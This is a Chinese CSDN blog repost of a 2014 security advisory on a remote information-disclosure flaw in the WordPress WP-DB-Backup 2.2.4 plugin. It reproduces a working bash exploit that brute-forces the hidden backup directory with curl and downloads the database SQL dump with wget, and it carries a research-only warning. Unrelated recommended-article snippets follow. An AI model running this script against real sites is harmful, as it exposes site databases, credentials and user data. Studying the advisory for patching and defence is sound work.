wp-db.php,WordPress WP-DB-Backup插件'wp-db-backup.php'远程信息泄露漏洞

最新推荐文章于 2022-01-04 00:45:48 发布
最新推荐文章于 2022-01-04 00:45:48 发布
阅读量133 收藏
点赞数
文章标签: wp-db.php
本文详细介绍了WordPress的WP-DB-Backup插件在2.2.4版本及其以下存在的远程信息泄露漏洞,攻击者可以利用此漏洞获取敏感信息。文章提供了测试方法和建议用户关注厂商主页以获取最新版本来修复问题。
摘要由CSDN通过智能技术生成

发布日期:2014-11-19

更新日期:2014-11-21

受影响系统:

WordPress WP-DB-Backup 2.2.4

WordPress WP-DB-Backup

描述:

BUGTRAQ  ID: 71177

WP-DB-Backup插件可以备份核心WordPress数据库表。

WP-DB-Backup 2.2.4及其他版本在实现上存在远程信息泄露漏洞,远程攻击者可利用此漏洞获取敏感信息。

*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/bash

#Larry W. Cashdollar, @_larry0

#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/

#Usage: Compile raintable.c

#gcc raintable.c -o table;./table > rainbow

#run ./exp targetsite date

#date is in format YYYYMMDD e.g 20141031

if [ ! -e found.txt ]; then

Z=0

K=`wc -l rainbow|awk '{print $1}'`;

echo "[+] Searching....";

for x in `cat rainbow`; do

CPATH="http://$1/wp-content/backup-$x/";

RESULT=`curl -s --head $CPATH|grep 200`;

if [ -n "$RESULT" ]; then

echo "[+] Location $CPATH Found";

echo "[+] Received $RESULT";

echo $x > found.txt

exit; #break here

fi;

echo -n "Percent Done: ";

Y=`echo "scale=6;($Z/$K)*100"|bc`;

echo -n $Y

echo "%";

Z=$(( $Z + 1 ));

done

else

x=`cat found.txt`;

fi

# Now that we have the directory lets try to locate the database backup file.

K=999;

for y in `seq -w 0 999`; do

CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql";

RESULT=`curl -s --head $CPATH|grep 200`;

if [ -n "$RESULT" ]; then

echo "[+] Database backup $CPATH Found";

echo "[+] Received $RESULT";

wget $CPATH

exit; #break here

fi;

echo -n "Percent Done: ";

Y=`echo "scale=2;($Z/$K)*100"|bc`;

echo -n $Y

echo "%";

Z=$(( $Z + 1 ));

done

建议:

厂商补丁:

WordPress

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

多巴胺小姐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python 电影天堂爬虫源文件
06-12
本文件是在python3下,编写的 一个简单的爬虫源码,大家可以交流一下。 本爬虫只适合于静态,通过分析 电影天堂网站,发现网站源码是静态的,固通过此方法将其下载地址进行抓取。
WordPress数据库备份插件WP-DB-Backup使用教程详解
colorfulyan的博客
12-17 858
wordpress的优势是开源,支持各种插件主题,最大的缺点就是吃主机性能,所以一些博主选择了zblog建站。人各有志,我还是喜欢Wordpress,毕竟wordpress是世界上最受欢迎的博客程序。 使用wordpress必须经常数据备份,这个是所有站长必做的功课,毕竟主机都是租用别人的。万一主机数据丢失,咱们的网站不就清零了。博主写一篇文章那么辛苦,文章如果丢失了,那简单就是晴天霹雳,心疼的不...
WP7 示例代码大全
jazywoo_在路上
04-15 1万+
开发WP7,查看     http://msdn.microsoft.com/zh-cn/library/ff431744(v=VS.92).aspx 基本上所有的例子都有 Windows Phone 的代码示例 Windows Phone 开发人员可以下载这些代码示例和应用程序(如 Panorama/Pivot 控件、Bing 地图和单位转换器)来体验 Wind
wp_terms分类信息表—WordPress数据库研究(2.6.2版本)#8
weixin_33849215的博客
12-28 826
本文是《WordPress数据库研究(2.6.2版本)》 的第八篇文章,该篇文章对WordPress数据库中的wp_terms分类信息表表做详细介绍,包括了wp_terms分类信息表各个字段的含 义、与其它数据表的关联关系、索引信息。如果你对WordPress博客系统中10个数据表的总 体关系还不清楚,请返回该系列 文章的第一篇《WordPress数据库简介》。 wp_terms分类表是Word...
wp/wordpress分享到微信/QQ…代码
QUX轻博客
08-08 8741
wp主题分享功能非常常见和重要,那么作为主题开发者,主题里面怎么加入分享代码呢?这里我们用的百度分享代码,你如果不是太熟悉可以先看看《百度分享插件,可分享到QQ,微信...
WP-DBManager2.50 简体中文包插件 for WordPress.zip
07-14
2.插件激活之后,会在wp-content目录生成一个backup-db的目录,目录的默认需要的权限是:777。   3.将wp-content/plugins/wp-dbmanager目录中的 htaccess.txt修改为:.htaccess ,并把.htaccess 文件移动到:...
wp-db-backup
12-29
其中,“wp-db-backup”就是一款专为WordPress用户设计的高效数据库备份插件,它提供了强大的功能,帮助用户确保他们的宝贵数据得到妥善保护。 “wp-db-backup插件的主要功能包括: 1. **本地备份**:这款插件...
wp-dbmanager:允许您优化数据库,修复数据库,备份数据库,还原数据库,删除备份数据库,空表和运行选定的查询。 支持自动计划备份,优化和修复数据库
02-05
WP-DB管理器贡献者:GamerZ 捐赠链接: : 标签:数据库,管理,wp-dbmanager,管理器...一般用法激活WP-DBManager插件如果该文件夹可写,该脚本将自动在wp-content文件夹中创建一个名为backup-db的文件夹。 如果未创建
数据库备份插件WP-DBManager
10-17
WP-DBManager是wordpress的数据备份插件,目前最新版本为2.40,其主要用途是对WordPress 的数据库进行管理,从而省去了用户必须使用类似PhpMyadmin登录数据库进行备份、修复、导入等操作,并且可以前台执行 SQL 语句...
WP常用函数汇总
dodosong的专栏
03-23 9793
<br />转自 http://www.licream.net/wp%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0%E6%B1%87%E6%80%BB.html<br /> <br /><br />基本模板文件<br />style.css : CSS(样式表)文件<br />index.php : 主页模板<br />archive.php : Archive/Category模板<br />404.php : Not Found 错误页模板<br />comments.php
玩机技巧 WP功能解析之网络共享
MinSen
07-01 9174
用了7个多月Windows Phone,目睹了WP的高速发展,小编由衷地向各位为WP发展做出贡献的开发者表示敬意,没有你们的努力就没有现在的WP。虽然目前的WP在某些细节上还存在一定BUG,但整体的优秀是无法掩盖的。下面就让小编为大家对WP的网络共享进行解析(目前只有部分LG及三星O7用户收到了网络共享的更新,相信在近几周各位用户会陆续收到,没收到的用户请耐心等待)。 网络共享功能是一个非常实用
教你学会WP7 18个小功能
wqybsxf12的专栏
01-18 2202
也许你正在看何时Windows Phone 7才能实现更多的小功能,如果你有WP7系统或想了解WP7 手机 的信息,看看这18个小功能吧,开始体验一下你的Windows Phone 7之旅吧。 1.使用Windows 7的语音控制 电话 按住屏幕底部的Windows键,就可以开始跟手机对话,尝试:”Open Music指令(打开音乐),看看我们的手机会有什么反应。
使用WordPress搭建一个专属自己的博客(WP安装篇)
佛系豪豪
01-04 2273
安装WordPress中文版 安装WordPress。 a. 执行以下命令,获取wordpress中文安装包。因为是从官网拉取安装包,速度稍慢,耐心等待即可。 wget https://cn.wordpress.org/latest-zh_CN.tar.gz b. 执行以下命令,解压。 tar -zxvf latest-zh_CN.tar.gz c. 执行以下命令,移动wordpress到Apache根目录。 mkdir /var/www/html/wp-blog mv wordpress/*
java 短信发送例子 tdy
avqu70655的博客
09-04 198
import java.io.IOException; import java.util.logging.Level;import java.util.logging.Logger;import org.apache.commons.httpclient.HttpClient;import org.apache.commons.httpclient.HttpException;impo...
史上最详细sql注入wp
热门推荐
lyy0xfff的博客
07-26 2万+
文章目录sql注入wp(史上最详细)前言什么是SQL注入?SQL注入的原理常见的注入方式常见绕过技巧常见防控SQL注入的方法手工查询语句Basic ChallengesLess-1 **Error Based- String**Less-2 Error **Based- Integer**Less-3 Error Based- String (with Twist)Less-4 Error Based- DoubleQuotes String@@Less-5 Double Query- Single Quo
餐厅点餐系统springboot.zip
09-10
开发一个基于Spring Boot的餐厅点餐系统可以大大提高餐厅的服务效率和顾客体验。下面是一个简单的案例程序,展示了如何使用Spring Boot来构建这样一个系统。这个系统将包括用户管理、菜单管理、订单管理等基本功能。 1. 创建项目 首先,通过Spring Initializr(https://start.spring.io/)创建一个新的Spring Boot项目,并添加必要的依赖项,如Web、Thymeleaf、Spring Data JPA 和 MySQL Driver。
MATLAB_SIMULINK中的病毒传播模拟器.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
Sigrity-Sigrity MCP Specification.rar
最新发布
09-10
Sigrity-Sigrity MCP Specification.rar 当引脚名称映射失败时,通过坐标映射为替代引脚映射方法添加可选的引脚坐标(相对于元件原点)。 本文档描述了信号模型连接协议(MCP)。 MCP用于在管芯(芯片)、封装和PCB之间连接电路模型和/或物理布局。 MCP允许任何MCP型号的Sigrity产品内的自动模型和结构连接。 它还允许第三方工具将Sigrity模型与MCP集成或连接。 MCP使用简单的ASCII格式,支持模型连接的多个电路和引脚,并允许将物理引脚集中在电路模型中。 MCP具有可扩展性和向后兼容性。
WordPress wp-config.php配置详解:数据库、安全密钥与字符集
"这篇文档详细解释了WordPress的配置文件wp-config.php,涵盖了数据库连接设置、字符集与整理、以及安全密匙的配置等关键信息,旨在帮助用户更好地理解和定制WordPress站点。" 在WordPress中,`wp-config.php`是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值